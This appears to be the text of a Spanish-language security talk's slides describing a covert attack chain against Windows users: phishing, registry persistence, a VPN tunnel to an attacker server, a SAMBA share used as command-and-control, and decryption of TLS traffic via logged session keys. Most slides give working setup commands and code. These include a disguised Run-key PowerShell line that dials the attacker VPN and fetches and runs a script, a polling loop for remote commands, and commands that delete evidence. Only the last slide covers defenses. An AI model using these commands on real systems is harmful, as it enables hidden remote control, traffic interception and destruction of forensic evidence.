8. Índice
- Phishing: correo electrónico como vector de entrada
- Persistencia: archivo .reg con comandos powershell
- Canal seguro: conexión automática a nuestra VPN
- Control remoto: mediante ejecución continua de scripts
- Exfiltración de archivos: mediante SAMBA
- MITM TLS: compartiendo las pre-master keys
10. Servidor de ficheros como C&C
apt-get install samba samba-common python-glade2 system-config-samba
vi /etc/samba/smb.conf
[c]
path = /c2c
browseable = no
writables = yes
valid-users = u
adduser u
smbpasswd –a u
mkdir /c2c
chown –R u /c2c
service smbd restart
12. Persistencia (archivo .reg)
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"OneDrive"=""C:UsersuserAppDataLocalMicrosoftOneDriveOneDrive.exe" /background"
"Windows"="powershell -w 1 -c cd $Env:appdataMicrosoftNetworkConnectionsPbk;echo
[v]`r`nMEDIA=rastapi`r`nPort=VPN2-0`r`nDEVICE=vpn`r`nPhoneNumber=vpn1.ga|Out-File -E
ASCII rasphone.pbk;rasdial v u p;net use vpn2.gac /user:u p;copy-item vpn2.gacc
c.bat;.c.bat"
- Recortamos IPs con nombres de dominio cortos
- Recortamos nombres de usuario y contraseña
- Recortamos rutas y nombres de los scripts
14. VPN como canal seguro con el servidor
apt-get install pptpd
vi /etc/ppp/pptpd-options
ms-dns 8.8.8.8
ms-dns 8.8.4.4
vi /etc/ppp/chap-secrets
u pptpd p *
vi /etc/pptpd.conf
localip 172.0.0.1
remoteip 172.0.0.100-200
vi /etc/sysctl.conf
net.ipv4.ip_forward = 1
sysctl –p
service pptpd restart
iptables -t nat -I POSTROUTING -o ens3 -j MASQUERADE
15. Control remoto con scripts en batch
:cmd
if exist vpn2.gaccmd.bat (
move vpn2.gaccmd.bat vpn2.gaccmdtorun.bat
call vpn2.gaccmdtorun.bat>vpn2.gaccmd.txt
)
ping -n 20 localhost
goto :cmd
- Bucle para recibir instrucciones cada 20 segundos
- Comprobación de nuevas instrucciones (cmd.bat)
- Renombramos para evitar solapar ejecuciones
- Volcamos los resultados del script a un archivo de texto
18. Manel in the middle
sudo add-apt-repository ppa:wireshark-dev/stable
sudo apt update
sudo apt -y install wireshark
19. Manel in the middle
vi cmd.bat
setx SSLKEYLOGFILE “vpn2.gacpmk.log”
Variable de entorno utilizada por Chrome y Firefox
20. Manel in the middle
- Las pre-master keys permiten que Wireshark vea el TLS
21. Desconexión del equipo
- Borrar clave de registro
- Borrar configuración de la VPN (rasphone.pbk)
- Borrar script de persitencia (c.bat)
- Borrar otras pruebas de acciones realizadas
- Desconectar de la red
reg delete HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v Windows /fdel /q
%appdata%MicrosoftNetworkConnectionsPbkrasphone.pbk
del /q %appdata%MicrosoftNetworkConnectionsPbkc.bat
rasdial /disconnect
22. Puntos positivos
- “Complejo” de detectar: ByPass sandbox, anti-spam, ejecución en
fases (infección y conexión)
- Sin privilegios: es posible llevar a cabo el ataque sobre un usuario
sin privilegios de administrador
- Canal seguro: utilizamos el cifrado de la VPN como canal de
comunicación seguro, evitando así ser inspeccionado por IPS,
Firewall…
- Malware-less: no se utiliza ningún malware ni se explota ninguna
vulnerabilidad de sistemas o aplicaciones
23. ¿Podemos evitar estos ataques?
Tecnologías
- Segregación de red
- Mayor protección del endpoint (EDR)
- Tecnologías de monitorización y recolección de logs
SOC / Analistas de seguridad
- Políticas de firewall más restrictivas (VPN proveedores)
- Monitorización de claves de registro (catálogo aplicaciones)
- KPIs y alertas a revisar diariamente (TOPs, duración sesiones)
- Concienciación (charlas, píldoras informativas, ejercicios…)